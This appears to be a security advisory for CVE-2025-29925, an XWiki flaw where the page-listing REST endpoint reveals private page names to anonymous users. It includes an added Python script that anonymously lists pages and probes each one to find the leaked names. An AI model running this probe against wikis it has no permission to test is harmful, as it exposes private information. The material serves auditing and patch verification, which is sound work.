CVE-2025-29925: XWiki allows unregistered users to access private pages information through REST endpoint
Pages the requesting user has no view right on are still listed by the REST endpoint /rest/wikis/[wikiName]/pages, so their existence and names are exposed to anyone who can reach the endpoint.
This is particularly visible when the entire wiki is protected with "Prevent unregistered user to view pages": an unauthenticated request still returns the wiki's page list. In practice only the main wiki is affected, because of XWIKI-22639.
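The check a practitioner would run against an instance: request the page listing anonymously, then probe each listed page resource anonymously and flag every page that is listed but not served. The script below is an added example, not code from XWiki or from the advisory. It assumes the listing is served as JSON with a "pageSummaries" array whose entries carry "fullName", that a page resource lives at /rest/wikis/{wiki}/spaces/{space}/pages/{page} (one /spaces/ segment per nested space), and that a non-200 status on the page resource means the caller may not view it; the embedded sample listing is constructed.

```python
"""Probe an XWiki instance for the CVE-2025-29925 behaviour: the page listing
REST resource returning pages the (anonymous) caller is not allowed to view.
Added example, not code from the XWiki project; all endpoint shapes are
assumptions stated in the comments."""
import json
import urllib.error
import urllib.request
from urllib.parse import quote

# Constructed sample of a JSON listing from /rest/wikis/{wiki}/pages.
# Shape assumed: a "pageSummaries" array whose items carry "fullName".
SAMPLE_LISTING = json.dumps({
    "pageSummaries": [
        {"id": "xwiki:Main.WebHome", "fullName": "Main.WebHome",
         "wiki": "xwiki", "space": "Main", "name": "WebHome"},
        {"id": "xwiki:Sandbox.WebHome", "fullName": "Sandbox.WebHome",
         "wiki": "xwiki", "space": "Sandbox", "name": "WebHome"},
        {"id": "xwiki:HR.Salaries", "fullName": "HR.Salaries",
         "wiki": "xwiki", "space": "HR", "name": "Salaries"},
    ]
})


def listed_pages(listing_body):
    """Return the fullNames contained in a listing response (JSON text)."""
    data = json.loads(listing_body)
    return [p["fullName"] for p in data.get("pageSummaries", [])]


def page_resource_path(wiki, full_name):
    """Map 'A.B.Page' to /rest/wikis/{wiki}/spaces/A/spaces/B/pages/Page.
    Assumption: dots separate spaces; escaped dots inside names are not handled."""
    parts = full_name.split(".")
    spaces, page = parts[:-1], parts[-1]
    path = "/rest/wikis/" + quote(wiki, safe="")
    for space in spaces:
        path += "/spaces/" + quote(space, safe="")
    return path + "/pages/" + quote(page, safe="")


def leaked_pages(listing_body, can_view):
    """Pages present in the listing that can_view(full_name) reports the same
    caller cannot read. Any entry here is the information leak of CVE-2025-29925."""
    return [name for name in listed_pages(listing_body) if not can_view(name)]


def http_status(url, accept="application/json"):
    """Anonymous GET (no credentials); returns (status, body)."""
    req = urllib.request.Request(url, headers={"Accept": accept})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


def check_wiki(base_url, wiki="xwiki"):
    """Live check: fetch the listing anonymously, then probe each listed page
    anonymously. Returns the fullNames the server lists but refuses to serve."""
    base = base_url.rstrip("/")
    status, body = http_status(base + "/rest/wikis/" + quote(wiki, safe="") + "/pages")
    if status != 200:
        return []  # listing itself denied: nothing is leaked by this resource

    def can_view(full_name):
        page_status, _ = http_status(base + page_resource_path(wiki, full_name))
        return page_status == 200

    return leaked_pages(body, can_view)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample: pretend anonymous users
    # may only view Sandbox.WebHome, so the other two entries are leaks.
    allowed = {"Sandbox.WebHome"}
    print(leaked_pages(SAMPLE_LISTING, lambda name: name in allowed))
    # For a live instance: print(check_wiki("https://wiki.example.test"))
```

On a main wiki protected with "Prevent unregistered user to view pages", every page the anonymous listing returns should appear in the result, since no page resource is served to the anonymous caller; after the fix the listing request itself is denied and the function returns an empty list. The listing resource is paginated in XWiki, so a complete audit would also walk the paging parameters, which this example does not do.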
References
- github.com/advisories/GHSA-22q5-9phm-744v
- github.com/xwiki/xwiki-platform
- github.com/xwiki/xwiki-platform/commit/1fb12d2780f37b34a1b4dfdf8457d97ce5cbb2df
- github.com/xwiki/xwiki-platform/commit/bca72f5ce971a31dba2a016d8dd8badda4475206
- github.com/xwiki/xwiki-platform/security/advisories/GHSA-22q5-9phm-744v
- jira.xwiki.org/browse/XWIKI-22630
- jira.xwiki.org/browse/XWIKI-22639
- nvd.nist.gov/vuln/detail/CVE-2025-29925